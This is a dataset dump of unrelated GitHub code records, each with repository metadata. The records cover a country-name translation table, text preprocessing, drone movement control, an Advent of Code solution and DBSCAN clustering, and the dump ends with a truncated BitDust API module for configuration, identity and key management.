'Montenegro':'黑山',\n 'Mongolia':'蒙古',\n 'Mozambique':'莫桑比克',\n 'Mauritania':'毛里塔尼亚',\n 'Malawi':'马拉维',\n 'Malaysia':'马来西亚',\n 'Namibia':'纳米比亚',\n 'New Caledonia':'新喀里多尼亚',\n 'Niger':'尼日尔',\n 'Nigeria':'尼日利亚',\n 'Nicaragua':'尼加拉瓜',\n 'Netherlands':'荷兰',\n 'Norway':'挪威',\n 'Nepal':'尼泊尔',\n 'New Zealand':'新西兰',\n 'Oman':'阿曼',\n 'Pakistan':'巴基斯坦',\n 'Panama':'巴拿马',\n 'Peru':'秘鲁',\n 'Philippines':'菲律宾',\n 'Papua New Guinea':'巴布亚新几内亚',\n 'Poland':'波兰',\n 'Puerto Rico':'波多黎各',\n 'Dem. Rep. Korea':'朝鲜',\n 'Portugal':'葡萄牙',\n 'Paraguay':'巴拉圭',\n 'Qatar':'卡塔尔',\n 'Romania':'罗马尼亚',\n 'Russia':'俄罗斯',\n 'Rwanda':'卢旺达',\n 'W. Sahara':'西撒哈拉',\n 'Saudi Arabia':'沙特阿拉伯',\n 'Sudan':'苏丹',\n 'S. Sudan':'南苏丹',\n 'Senegal':'塞内加尔',\n 'Solomon Is.':'所罗门群岛',\n 'Sierra Leone':'塞拉利昂',\n 'El Salvador':'萨尔瓦多',\n 'Somaliland':'索马里兰',\n 'Somalia':'索马里',\n 'Serbia':'塞尔维亚',\n 'Suriname':'苏里南',\n 'Slovakia':'斯洛伐克',\n 'Slovenia':'斯洛文尼亚',\n 'Sweden':'瑞典',\n 'Swaziland':'斯威士兰',\n 'Syria':'叙利亚',\n 'Chad':'乍得',\n 'Togo':'多哥',\n 'Thailand':'泰国',\n 'Tajikistan':'塔吉克斯坦',\n 'Turkmenistan':'土库曼斯坦',\n 'East Timor':'东帝汶',\n 'Trinidad and Tobago':'特里尼达和多巴哥',\n 'Tunisia':'突尼斯',\n 'Turkey':'土耳其',\n 'Tanzania':'坦桑尼亚',\n 'Uganda':'乌干达',\n 'Ukraine':'乌克兰',\n 'Uruguay':'乌拉圭',\n 'United States':'美国',\n 'Uzbekistan':'乌兹别克斯坦',\n 'Venezuela':'委内瑞拉',\n 'Vietnam':'越南',\n 'Vanuatu':'瓦努阿图',\n 'West Bank':'西岸',\n 'Yemen':'也门',\n 'South Africa':'南非',\n 'Zambia':'赞比亚',\n 'Zimbabwe':'津巴布韦'\n }\n\n\nif __name__ == '__main__':\n GetWorldData()\n\n","repo_name":"Jarrettluo/Word-Covid19-Map","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":10725,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"31481435448","text":"import string\nfrom nltk.stem.porter import PorterStemmer\nfrom sklearn.feature_extraction.text import ENGLISH_STOP_WORDS\nimport os\n\n# 构建标点符号集\nall_punc = string.punctuation\n\nifile_path = 'C:\\\\Users\\\\McFly\\\\source\\\\VSCode\\\\搜索引擎\\\\Org_EN\\\\'\nofile_path = 'C:\\\\Users\\\\McFly\\\\source\\\\VSCode\\\\搜索引擎\\\\New_EN\\\\'\n\nfiles = os.listdir(ifile_path)\nfor file_name in files:\n txt = []\n with open(ifile_path + file_name, 'r', encoding='UTF-8') as f:\n lines = f.readlines()\n for line in lines:\n # sentence = ''\n for c in all_punc:\n line = line.replace(c, '') # 删除所有标点符号\n\n line = line.lower() # 转换成小写字母\n\n # 去除停用词\n word_list = [\n word for word in line.split() if word not in ENGLISH_STOP_WORDS\n ]\n\n porter_stemmer = PorterStemmer()\n singles = [porter_stemmer.stem(word) for word in word_list]\n sentence = ' '.join(singles)\n\n txt.append(sentence)\n f.close()\n\n ofile_name = ofile_path + 'New_' + file_name\n with open(ofile_name, \"w\") as file: # 写入文件路径 + 章节名称 + 后缀\n for line in txt:\n file.write(line)\n","repo_name":"mcflyhu/SearchEngine-CurriculumProject","sub_path":"文本预处理/pretreat_EN.py","file_name":"pretreat_EN.py","file_ext":"py","file_size_in_byte":1263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"17685695130","text":"from pyparrot.Bebop import Bebop\nimport numpy\n\nif __name__ == \"__main__\":\n print(r\"\"\"\n Y\n ^\n |\n |\n |\n |\n |\n ------------x-------------------> X\n | (0,0) Initial Copter location\n |\n |\n |\n |\n \"\"\")\n previousPosition = (0, 0, 1, 0)\n bebop = Bebop(ip_address=\"10.202.0.1\")\n success = bebop.connect(2)\n bebop.safe_takeoff(10)\n yesStrings = {'yes', 'y', 'ye'}\n while True:\n try:\n\n exit = input(\"\\n\\n\\n\\tExit the program and land the copter (y/n)?\")\n if exit in yesStrings:\n break\n\n x = float(input(\"\\n\\n\\n\\tPlease input your desired coordinates:\\n\\tX: \"))\n y = float(input(\"\\n\\tY: \"))\n z = float(input(\"\\n\\tZ: \"))\n rotation = float(input(\"\\n\\tCopter Rotation (Radians): \"))\n delta = numpy.subtract((x, y, z, rotation), previousPosition)\n previousPosition = (x, y, z, rotation)\n\n print(delta)\n bebop.move_relative(0, 0, -delta[2], 0)\n bebop.move_relative(0, delta[0], 0, 0)\n bebop.move_relative(delta[1], 0, 0, 0)\n bebop.move_relative(0, 0, 0, delta[3])\n\n except:\n \n bebop.emergency_land()\n bebop.disconnect()\n print(\"\\tError found. Closing application\")\n import sys\n sys.exit(0)\n\n bebop.safe_land(10)\n bebop.disconnect()\n","repo_name":"kholysa/CopterTests","sub_path":"SimpleCopterMove/SimpleCopterMove.py","file_name":"SimpleCopterMove.py","file_ext":"py","file_size_in_byte":1577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"9842857557","text":"dictionary = {}\n\nwith open('day_7.txt') as f:\n for line in f:\n key = ' '.join(line.split()[0:2])\n value_str = ' '.join(line.split()[4:]).replace(' bags', '').replace(' bag', '').rstrip('.')\n value = []\n for bag in value_str.split(', '):\n if bag == 'no other':\n pass\n else:\n bag = bag.split()\n bag = bag[0], ' '.join(bag[1:])\n value.append(bag)\n dictionary.setdefault(key, value)\n\n\ndef shiny_bags(dictionary):\n '''How many colors can, eventually, contain at least one shiny gold bag?'''\n keys = ['shiny gold']\n new = []\n all_colors = []\n while keys: # until there is another key, which eventually contain shiny gold bag\n for key, value in dictionary.items():\n for tuple in value:\n if tuple[1] in keys: # contains bag, which contains shiny gold bag\n new.append(key)\n all_colors.append(key)\n keys = new\n new = []\n return len(set(all_colors)) # filter off duplicates\n\n\ndef shiny_bag_require(dictionary):\n ''' How many individual bags are required inside single shiny gold bag? '''\n count = -1\n tuple_number_color = [('1', 'shiny gold')]\n while tuple_number_color:\n one_cycle = []\n for number, color in tuple_number_color:\n for i in range(int(number)):\n count += 1\n one_cycle += dictionary[color]\n tuple_number_color = one_cycle\n return count\n\n\nprint(shiny_bags(dictionary)) # part 1\nprint(shiny_bag_require(dictionary)) # part 2","repo_name":"NelliaS/advent_of_code","sub_path":"advent_of_code_2020/day_7.py","file_name":"day_7.py","file_ext":"py","file_size_in_byte":1650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"10373174972","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Dec 2 08:50:56 2018\n\n@author: WT\n\"\"\"\nfrom src.cluster_plots import *\nfrom sklearn.cluster import DBSCAN\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom sklearn.neighbors import NearestNeighbors\n\ndff = pd.read_csv(\"inter.csv\") \nX = clean_engineered_df(dff)\n\n#X = do_PCA(X,pca_n=3)\n\nnb = NearestNeighbors(n_neighbors=3, algorithm='ball_tree').fit(X)\ndistances, indices = nb.kneighbors(X)\ndistances = [d[-1] for d in distances]\ndistances.sort()\n\nfig = plt.figure(figsize=(10,10))\nax = fig.add_subplot(111)\nax.scatter([i for i in range(len(distances))], distances)\nax.set_ylabel(\"KNN distance\")\nax.set_xlabel(\"points\")\nax.set_title(\"KNN plot\")\n\ndb = DBSCAN(eps=1, min_samples=4)\ny_hc = db.fit_predict(X)\nlabels = db.labels_\n\n# Number of clusters in labels, ignoring noise if present.\nn_clusters_ = len(set(labels)) - (1 if -1 in labels else 0)\nn_noise_ = list(labels).count(-1)\n\nprint('Number of clusters: %d' % n_clusters_)\nprint('Number of noise points: %d' % n_noise_)\ncluster_info(dff,y_hc)","repo_name":"plkmo/E-Commerce-UK-dataset","sub_path":"dbscan.py","file_name":"dbscan.py","file_ext":"py","file_size_in_byte":1046,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"86"} +{"seq_id":"36437948807","text":"from pylab import *\nfrom scot.datatools import randomize_phase\nnp.random.seed(1234)\ns = np.sin(np.linspace(0,10*np.pi,1000)).T\nx = np.vstack([s, np.sign(s)]).T\ny = randomize_phase(x)\nsubplot(2,1,1)\ntitle('Phase randomization of sine wave and rectangular function')\nplot(x), axis([0,1000,-3,3])\nsubplot(2,1,2)\nplot(y), axis([0,1000,-3,3])\nplt.show()","repo_name":"scot-dev/scot-doc","sub_path":"api/scot/scot-1.py","file_name":"scot-1.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"86"} +{"seq_id":"6340800356","text":"#!/usr/bin/python\r\n# api.py\r\n#\r\n# Copyright (C) 2008-2018 Veselin Penev, https://bitdust.io\r\n#\r\n# This file (api.py) is part of BitDust Software.\r\n#\r\n# BitDust is free software: you can redistribute it and/or modify\r\n# it under the terms of the GNU Affero General Public License as published by\r\n# the Free Software Foundation, either version 3 of the License, or\r\n# (at your option) any later version.\r\n#\r\n# BitDust Software is distributed in the hope that it will be useful,\r\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n# GNU Affero General Public License for more details.\r\n#\r\n# You should have received a copy of the GNU Affero General Public License\r\n# along with BitDust Software. If not, see .\r\n#\r\n# Please contact us if you have any questions at bitdust.io@gmail.com\r\n#\r\n#\r\n#\r\n#\r\n\r\n\"\"\"\r\n.. module:: api.\r\n\r\nHere is a bunch of methods to interact with BitDust software.\r\n\"\"\"\r\n\r\n#------------------------------------------------------------------------------\r\n\r\n_Debug = False\r\n_DebugLevel = 10\r\n\r\n#------------------------------------------------------------------------------\r\n\r\nimport os\r\nimport sys\r\nimport time\r\nimport json\r\n\r\nfrom twisted.internet.defer import Deferred\r\n\r\nfrom logs import lg\r\n\r\nfrom services import driver\r\n\r\n#------------------------------------------------------------------------------\r\n\r\n\r\ndef on_api_result_prepared(result):\r\n # TODO\r\n return result\r\n\r\n#------------------------------------------------------------------------------\r\n\r\n\r\ndef OK(result='', message=None, status='OK', extra_fields=None):\r\n o = {'status': status, }\r\n if result:\r\n o['result'] = result if isinstance(result, list) else [result, ]\r\n if message is not None:\r\n o['message'] = message\r\n if extra_fields is not None:\r\n o.update(extra_fields)\r\n o = on_api_result_prepared(o)\r\n api_method = sys._getframe().f_back.f_code.co_name\r\n if _Debug:\r\n lg.out(_DebugLevel, 'api.%s return OK(%s)' % (api_method, json.dumps(o, sort_keys=True)[:150]))\r\n return o\r\n\r\n\r\ndef RESULT(result=[], message=None, status='OK', errors=None, source=None):\r\n o = {}\r\n if source is not None:\r\n o.update(source)\r\n o.update({'status': status, 'result': result})\r\n if message is not None:\r\n o['message'] = message\r\n if errors is not None:\r\n o['errors'] = errors\r\n o = on_api_result_prepared(o)\r\n api_method = sys._getframe().f_back.f_code.co_name\r\n if _Debug:\r\n lg.out(_DebugLevel, 'api.%s return RESULT(%s)' % (api_method, json.dumps(o, sort_keys=True)[:150]))\r\n return o\r\n\r\n\r\ndef ERROR(errors=[], message=None, status='ERROR', extra_fields=None):\r\n o = {'status': status,\r\n 'errors': errors if isinstance(errors, list) else [errors, ]}\r\n if message is not None:\r\n o['message'] = message\r\n if extra_fields is not None:\r\n o.update(extra_fields)\r\n o = on_api_result_prepared(o)\r\n api_method = sys._getframe().f_back.f_code.co_name\r\n if _Debug:\r\n lg.out(_DebugLevel, 'api.%s return ERROR(%s)' % (api_method, json.dumps(o, sort_keys=True)[:150]))\r\n return o\r\n\r\n#------------------------------------------------------------------------------\r\n\r\n\r\ndef stop():\r\n \"\"\"\r\n Stop the main process immediately.\r\n\r\n Return:\r\n\r\n {'status': 'OK', 'result': 'stopped'}\r\n \"\"\"\r\n lg.out(4, 'api.stop sending event \"stop\" to the shutdowner() machine')\r\n from twisted.internet import reactor\r\n from main import shutdowner\r\n reactor.callLater(0.1, shutdowner.A, 'stop', 'exit')\r\n # shutdowner.A('stop', 'exit')\r\n return OK('stopped')\r\n\r\n\r\ndef restart(showgui=False):\r\n \"\"\"\r\n Restart the main process, if flag show=True the GUI will be opened after\r\n restart.\r\n\r\n Return:\r\n\r\n {'status': 'OK', 'result': 'restarted'}\r\n \"\"\"\r\n from twisted.internet import reactor\r\n from main import shutdowner\r\n if showgui:\r\n lg.out(4, 'api.restart forced for GUI, added param \"show\", sending event \"stop\" to the shutdowner() machine')\r\n reactor.callLater(0.1, shutdowner.A, 'stop', 'restartnshow')\r\n # shutdowner.A('stop', 'restartnshow')\r\n return OK('restarted with GUI')\r\n lg.out(4, 'api.restart did not found bpgui process nor forced for GUI, just do the restart, sending event \"stop\" to the shutdowner() machine')\r\n # shutdowner.A('stop', 'restart')\r\n reactor.callLater(0.1, shutdowner.A, 'stop', 'restart')\r\n return OK('restarted')\r\n\r\n\r\ndef show():\r\n \"\"\"\r\n Opens a default web browser to show the BitDust GUI.\r\n\r\n Return:\r\n\r\n {'status': 'OK', 'result': '\"show\" event has been sent to the main process'}\r\n \"\"\"\r\n lg.out(4, 'api.show')\r\n # TODO: raise up electron window ?\r\n return OK('\"show\" event has been sent to the main process')\r\n\r\ndef health():\r\n \"\"\"\r\n Returns true if system is running \r\n\r\n Return:\r\n\r\n {'status': 'OK' }\r\n \"\"\"\r\n lg.out(4, 'api.health')\r\n\r\n return OK()\r\n\r\n#------------------------------------------------------------------------------\r\n\r\n\r\ndef config_get(key):\r\n \"\"\"\r\n Returns current value for specific option from program settings.\r\n\r\n Return:\r\n\r\n {'status': 'OK', 'result': [{'type': 'positive integer', 'value': '8', 'key': 'logs/debug-level'}]}\r\n \"\"\"\r\n try:\r\n key = str(key).strip('/')\r\n except:\r\n return ERROR('wrong key')\r\n lg.out(4, 'api.config_get [%s]' % key)\r\n from main import config\r\n from main import config_types\r\n if key and not config.conf().exist(key):\r\n return ERROR('option \"%s\" not exist' % key)\r\n\r\n def _get_item(key):\r\n typ = config.conf().getType(key)\r\n typ_label = config.conf().getTypeLabel(key)\r\n value = None\r\n if not typ or typ in [config_types.TYPE_STRING,\r\n config_types.TYPE_TEXT,\r\n config_types.TYPE_UNDEFINED, ]:\r\n value = config.conf().getData(key)\r\n elif typ in [config_types.TYPE_BOOLEAN, ]:\r\n value = config.conf().getBool(key)\r\n elif typ in [config_types.TYPE_INTEGER,\r\n config_types.TYPE_POSITIVE_INTEGER,\r\n config_types.TYPE_NON_ZERO_POSITIVE_INTEGER, ]:\r\n value = config.conf().getInt(key)\r\n elif typ in [config_types.TYPE_FOLDER_PATH,\r\n config_types.TYPE_FILE_PATH,\r\n config_types.TYPE_COMBO_BOX,\r\n config_types.TYPE_PASSWORD, ]:\r\n value = config.conf().getString(key)\r\n else:\r\n value = config.conf().getData(key)\r\n return {\r\n 'key': key,\r\n 'value': value,\r\n 'type': typ_label,\r\n }\r\n\r\n if key and not config.conf().hasChilds(key):\r\n return RESULT([_get_item(key), ], )\r\n childs = []\r\n for child in config.conf().listEntries(key):\r\n if config.conf().hasChilds(child):\r\n childs.append({\r\n 'key': child,\r\n 'childs': len(config.conf().listEntries(child)),\r\n })\r\n else:\r\n childs.append(_get_item(key))\r\n return RESULT(childs)\r\n\r\n\r\ndef config_set(key, value):\r\n \"\"\"\r\n Set a value for given option.\r\n\r\n Return:\r\n\r\n {'status': 'OK', 'result': [{'type': 'positive integer', 'old_value': '8', 'value': '10', 'key': 'logs/debug-level'}]}\r\n \"\"\"\r\n key = str(key)\r\n from main import config\r\n from main import config_types\r\n v = {}\r\n if config.conf().exist(key):\r\n v['old_value'] = config.conf().getData(key)\r\n typ = config.conf().getType(key)\r\n typ_label = config.conf().getTypeLabel(key)\r\n lg.out(4, 'api.config_set [%s]=%s type is %s' % (key, value, typ_label))\r\n if not typ or typ in [config_types.TYPE_STRING,\r\n config_types.TYPE_TEXT,\r\n config_types.TYPE_UNDEFINED, ]:\r\n config.conf().setData(key, unicode(value))\r\n elif typ in [config_types.TYPE_BOOLEAN, ]:\r\n if (isinstance(value, str) or isinstance(value, unicode)):\r\n vl = value.strip().lower() == 'true'\r\n else:\r\n vl = bool(value)\r\n config.conf().setBool(key, vl)\r\n elif typ in [config_types.TYPE_INTEGER,\r\n config_types.TYPE_POSITIVE_INTEGER,\r\n config_types.TYPE_NON_ZERO_POSITIVE_INTEGER, ]:\r\n config.conf().setInt(key, int(value))\r\n elif typ in [config_types.TYPE_FOLDER_PATH,\r\n config_types.TYPE_FILE_PATH,\r\n config_types.TYPE_COMBO_BOX,\r\n config_types.TYPE_PASSWORD, ]:\r\n config.conf().setString(key, value)\r\n else:\r\n config.conf().setData(key, unicode(value))\r\n v.update({'key': key,\r\n 'value': config.conf().getData(key),\r\n 'type': config.conf().getTypeLabel(key)\r\n # 'code': config.conf().getType(key),\r\n # 'label': config.conf().getLabel(key),\r\n # 'info': config.conf().getInfo(key),\r\n })\r\n return RESULT([v, ])\r\n\r\n\r\ndef config_list(sort=False):\r\n \"\"\"\r\n Provide detailed info about all options and values from settings.\r\n\r\n Return:\r\n\r\n {'status': 'OK',\r\n 'result': [{\r\n 'type': 'boolean',\r\n 'value': 'true',\r\n 'key': 'services/backups/enabled'\r\n }, {\r\n 'type': 'boolean',\r\n 'value': 'false',\r\n 'key': 'services/backups/keep-local-copies-enabled'\r\n }, {\r\n 'type': 'diskspace',\r\n 'value': '128 MB',\r\n 'key': 'services/backups/max-block-size'\r\n }]}\r\n \"\"\"\r\n lg.out(4, 'api.config_list')\r\n from main import config\r\n r = config.conf().cache()\r\n r = map(lambda key: {\r\n 'key': key,\r\n 'value': str(r[key]).replace('\\n', '\\\\n'),\r\n 'type': config.conf().getTypeLabel(key)}, r.keys())\r\n if sort:\r\n r = sorted(r, key=lambda i: i['key'])\r\n return RESULT(r)\r\n\r\n#------------------------------------------------------------------------------\r\n\r\ndef identity_get(include_xml_source=False):\r\n \"\"\"\r\n \"\"\"\r\n from userid import my_id\r\n if not my_id.isLocalIdentityReady():\r\n return ERROR('local identity is not valid or not exist')\r\n r = my_id.getLocalIdentity().serialize_json()\r\n if include_xml_source:\r\n r['xml'] = my_id.getLocalIdentity().serialize()\r\n return RESULT([r, ])\r\n\r\ndef identity_create(username):\r\n from lib import misc\r\n from userid import my_id\r\n from userid import id_registrator\r\n\r\n try:\r\n username = str(username)\r\n except:\r\n return ERROR('invalid user name')\r\n if not misc.ValidUserName(username):\r\n return ERROR('invalid user name')\r\n\r\n ret = Deferred()\r\n my_id_registrator = id_registrator.A()\r\n\r\n def _id_registrator_state_changed(oldstate, newstate, event_string, args):\r\n if newstate == 'FAILED':\r\n ret.callback(ERROR(my_id_registrator.last_message))\r\n return\r\n if newstate == 'DONE':\r\n my_id.loadLocalIdentity()\r\n if not my_id.isLocalIdentityReady():\r\n return ERROR('identity creation FAILED')\r\n r = my_id.getLocalIdentity().serialize_json()\r\n r['xml'] = my_id.getLocalIdentity().serialize()\r\n ret.callback(RESULT([r, ]))\r\n return\r\n\r\n my_id_registrator.addStateChangedCallback(_id_registrator_state_changed)\r\n my_id_registrator.A('start', (username, ))\r\n return ret\r\n\r\ndef identity_recover(private_key_source, known_idurl=None):\r\n from lib import nameurl\r\n from userid import my_id\r\n from userid import id_restorer\r\n\r\n if not private_key_source:\r\n return ERROR('must provide private key in order to recover your identity')\r\n if len(private_key_source) > 1024 * 10:\r\n return ERROR('private key is too large')\r\n\r\n idurl = ''\r\n pk_source = ''\r\n try:\r\n lines = private_key_source.split('\\n')\r\n idurl = lines[0]\r\n pk_source = '\\n'.join(lines[1:])\r\n if idurl != nameurl.FilenameUrl(nameurl.UrlFilename(idurl)):\r\n idurl = ''\r\n pk_source = private_key_source\r\n except:\r\n idurl = ''\r\n pk_source = private_key_source\r\n if not idurl and known_idurl:\r\n idurl = known_idurl\r\n if not idurl:\r\n return ERROR('you must specify the global IDURL address where your identity file was last located')\r\n\r\n ret = Deferred()\r\n my_id_restorer = id_restorer.A()\r\n\r\n def _id_restorer_state_changed(oldstate, newstate, event_string, args):\r\n if newstate == 'FAILED':\r\n ret.callback(ERROR(my_id_restorer.last_message))\r\n return\r\n if newstate == 'RESTORED!':\r\n my_id.loadLocalIdentity()\r\n if not my_id.isLocalIdentityReady():\r\n return ERROR('identity recovery FAILED')\r\n r = my_id.getLocalIdentity().serialize_json()\r\n r['xml'] = my_id.getLocalIdentity().serialize()\r\n ret.callback(RESULT([r, ]))\r\n return\r\n\r\n my_id_restorer.addStateChangedCallback(_id_restorer_state_changed)\r\n my_id_restorer.A('start', {'idurl': idurl, 'keysrc': pk_source, })\r\n return ret\r\n\r\ndef identity_list():\r\n \"\"\"\r\n \"\"\"\r\n from contacts import identitycache\r\n results = []\r\n for id_obj in identitycache.Items().values():\r\n r = id_obj.serialize_json()\r\n results.append(r)\r\n results.sort(key=lambda r: r['name'])\r\n return RESULT(results)\r\n\r\n#------------------------------------------------------------------------------\r\n\r\ndef key_get(key_id, include_private=False):\r\n \"\"\"\r\n Returns details of known private key.\r\n Use `include_private=True` to get Private Key as openssh formated string.\r\n\r\n Return:\r\n\r\n {'status': 'OK'.\r\n 'result': [{\r\n 'alias': 'cool',\r\n 'creator': 'http://p2p-id.ru/testveselin.xml',\r\n 'key_id': 'cool$testveselin@p2p-id.ru',\r\n 'fingerprint': '50:f9:f1:6d:e3:e4:25:61:0c:81:6f:79:24:4e:78:17',\r\n 'size': '4096',\r\n 'ssh_type': 'ssh-rsa',\r\n 'type': 'RSA',\r\n 'public': 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQCPy7AXI0HuQSdmMF...',\r\n 'private': '-----BEGIN RSA PRIVATE KEY-----\\nMIIJKAIBAAKCAgEAj8uw...'\r\n }]}\r\n \"\"\"\r\n lg.out(4, 'api.key_get')\r\n from crypt import my_keys\r\n try:\r\n r = my_keys.get_key_info(key_id=key_id, include_private=include_private)\r\n except Exception as exc:\r\n return ERROR(str(exc))\r\n return RESULT([r, ])\r\n\r\n\r\ndef keys_list(sort=False, include_private=False):\r\n \"\"\"\r\n List details for known Private Keys.\r\n Use `include_private=True` to get Private Keys as openssh formated strings.\r\n\r\n Return:\r\n {'status': 'OK',\r\n 'result': [{\r\n 'alias': 'master',\r\n 'key_id': 'master$veselin@p2p-id.ru',\r\n 'creator': 'http://p2p-id.ru/veselin.xml',\r\n 'fingerprint': '60:ce:ea:98:bf:3d:aa:ba:29:1e:b9:0c:3e:5c:3e:32',\r\n 'size': '2048',\r\n 'ssh_type': 'ssh-rsa',\r\n 'type': 'RSA',\r\n 'public': 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDbpo3VYR5zvLe5...'\r\n 'private': '-----BEGIN RSA PRIVATE KEY-----\\nMIIJKAIBAAKCAgEAj8uw...'\r\n }, {\r\n 'alias': 'another_key01',\r\n 'key_id': 'another_key01$veselin@p2p-id.ru',\r\n 'creator': 'http://p2p-id.ru/veselin.xml',\r\n 'fingerprint': '43:c8:3b:b6:da:3e:8a:3c:48:6f:92:bb:74:b4:05:6b',\r\n 'size': '4096',\r\n 'ssh_type': 'ssh-rsa',\r\n 'type': 'RSA',\r\n 'public': 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQCmgX6j2MwEyY...'\r\n 'private': '-----BEGIN RSA PRIVATE KEY-----\\nMIIJKsdAIBSjfAdfguw...'\r\n }]}\r\n \"\"\"\r\n lg.out(4, 'api.keys_list')\r\n from crypt import my_keys\r\n r = []\r\n for key_id, key_object in my_keys.known_keys().items():\r\n key_alias, creator_idurl = my_keys.split_key_id(key_id)\r\n if not key_alias or not creator_idurl:\r\n lg.warn('incorrect key_id: %s' % key_id)\r\n continue\r\n try:\r\n key_info = my_keys.make_key_info(key_object, key_id=key_id, include_private=include_private)\r\n except:\r\n key_info = my_keys.make_key_info(key_object, key_id=key_id, include_private=False)\r\n r.append(key_info)\r\n if sort:\r\n r = sorted(r, key=lambda i: i['alias'])\r\n r.insert(0, my_keys.make_master_key_info(include_private=include_private))\r\n return RESULT(r)\r\n\r\n\r\ndef key_create(key_alias, key_size=2048, include_private=False):\r\n \"\"\"\r\n Generate new Private Key and add it to the list of known keys with given `key_id`.\r\n\r\n Return:\r\n\r\n {'status': 'OK',\r\n 'message': 'new private key \"abcd\" was generated successfully',\r\n 'result': [{\r\n 'alias': 'abcd',\r\n 'id': 'abcd$veselin@p2p-id.ru',\r\n 'creator': 'http://p2p-id.ru/veselin.xml',\r\n 'fingerprint': 'bb:16:97:65:59:23:c2:5d:62:9d:ce:7d:36:73:c6:1f',\r\n 'size': '4096',\r\n 'ssh_type': 'ssh-rsa',\r\n 'type': 'RSA',\r\n 'public': 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQC8w2MhOPR/IoQ...'\r\n 'private': '-----BEGIN RSA PRIVATE KEY-----\\nMIIJKsdAIBSjfAdfguw...'\r\n }]}\r\n \"\"\"\r\n from crypt import my_keys\r\n from userid import my_id\r\n key_alias = str(key_alias)\r\n key_alias = key_alias.strip().lower()\r\n key_id = my_keys.make_key_id(key_alias, creator_idurl=my_id.getLocalID())\r\n if not my_keys.is_valid_key_id(key_id):\r\n return ERROR('key \"%s\" is not valid' % key_id)\r\n if my_keys.is_key_registered(key_id):\r\n return ERROR('key \"%s\" already exist' % key_id)\r\n lg.out(4, 'api.key_create id=%s, size=%s' % (key_id, key_size))\r\n key_object = my_keys.generate_key(key_id, key_size=key_size)\r\n if key_object is None:\r\n return ERROR('failed to generate private key \"%s\"' % key_id)\r\n return OK(my_keys.make_key_info(\r\n key_object,\r\n key_id=key_id,\r\n include_private=include_private\r\n ), message='new private key \"%s\" was generated successfully' % key_alias, )\r\n\r\n\r\ndef key_erase(key_id):\r\n \"\"\"\r\n Removes Private Key from the list of known keys and erase local file.\r\n\r\n Return:\r\n\r\n {'status': 'OK',\r\n 'message': 'private key \"ccc2\" was erased successfully',\r\n }\r\n \"\"\"\r\n from crypt import my_keys\r\n key_id = str(key_id)\r\n lg.out(4, 'api.keys_list')\r\n if key_id == 'master':\r\n return ERROR('\"master\" key can not be removed')\r\n key_alias, creator_idurl = my_keys.split_key_id(key_id)\r\n if not key_alias or not creator_idurl:\r\n return ERROR('icorrect key_id format')\r\n if not my_keys.erase_key(key_id):\r\n return ERROR('failed to erase private key \"%s\"' % key_alias)\r\n return OK(message='private key \"%s\" was erased successfully' % key_alias)\r\n\r\n\r\ndef key_share(key_id, trusted_global_id_or_idurl, include_private=False, timeout=10):\r\n \"\"\"\r\n Connects to remote node and transfer private key to that machine.\r\n This way remote user will be able to access those of your files which were encrypted with that private key.\r\n You can also share a public key, this way your supplier will know which data packets can be accessed by\r\n another customer.\r\n\r\n Returns:\r\n\r\n \"\"\"\r\n from userid import global_id\r\n try:\r\n trusted_global_id_or_idurl = str(trusted_global_id_or_idurl)\r\n full_key_id = str(key_id)\r\n except:\r\n return ERROR('error reading input parameters')\r\n if not driver.is_on('service_keys_registry'):\r\n return ERROR('service_keys_registry() is not started')\r\n glob_id = global_id.ParseGlobalID(full_key_id)\r\n if glob_id['key_alias'] == 'master':\r\n return ERROR('\"master\" key can not be shared')\r\n if not glob_id['key_alias'] or not glob_id['idurl']:\r\n return ERROR('icorrect key_id format')\r\n idurl = trusted_global_id_or_idurl\r\n if global_id.IsValidGlobalUser(idurl):\r\n idurl = global_id.GlobalUserToIDURL(idurl)\r\n from access import key_ring\r\n ret = Deferred()\r\n d = key_ring.share_key(key_id=full_key_id, trusted_idurl=idurl, include_private=include_private, timeout=timeout)\r\n d.addCallback(\r\n lambda resp: ret.callback(\r\n OK(str(resp))))\r\n d.addErrback(\r\n lambda err: ret.callback(\r\n ERROR(err.getErrorMessage())))\r\n return ret\r\n\r\n\r\ndef key_audit(key_id, untrusted_global_id_or_idurl, is_private=False, timeout=10):\r\n \"\"\"\r\n Connects to remote node identified by `idurl` parameter and request audit\r\n of a public or private key `key_id` on that machine.\r\n Returns True in the callback if audit process succeed - that means remote user\r\n posses that public or private key.\r\n\r\n Returns:\r\n \"\"\"\r\n from userid import global_id\r\n try:\r\n untrusted_global_id_or_idurl = str(untrusted_global_id_or_idurl)\r\n full_key_id = str(key_id)\r\n except:\r\n return ERROR('error reading input parameters')\r\n if not driver.is_on('service_keys_registry'):\r\n return ERROR('service_keys_registry() is not started')\r\n glob_id = global_id.ParseGlobalID(full_key_id)\r\n if not glob_id['key_alias'] or not glob_id['idurl']:\r\n return ERROR('icorrect key_id format')\r\n if global_id.IsValidGlobalUser(untrusted_global_id_or_idurl):\r\n idurl = global_id.GlobalUserToIDURL(untrusted_global_id_or_idurl)\r\n else:\r\n idurl = untrusted_global_id_or_idurl\r\n from access import key_ring\r\n ret = Deferred()\r\n if is_private:\r\n d = key_ring.audit_private_key(key_id=key_id, untrusted_idurl=idurl, timeout=timeout)\r\n else:\r\n d = key_ring.audit_public_key(key_id=key_id, untrusted_idurl=idurl, timeout=timeout)\r\n d.addCallback(\r\n lambda resp: ret.callback(\r\n OK(str(resp))))\r\n 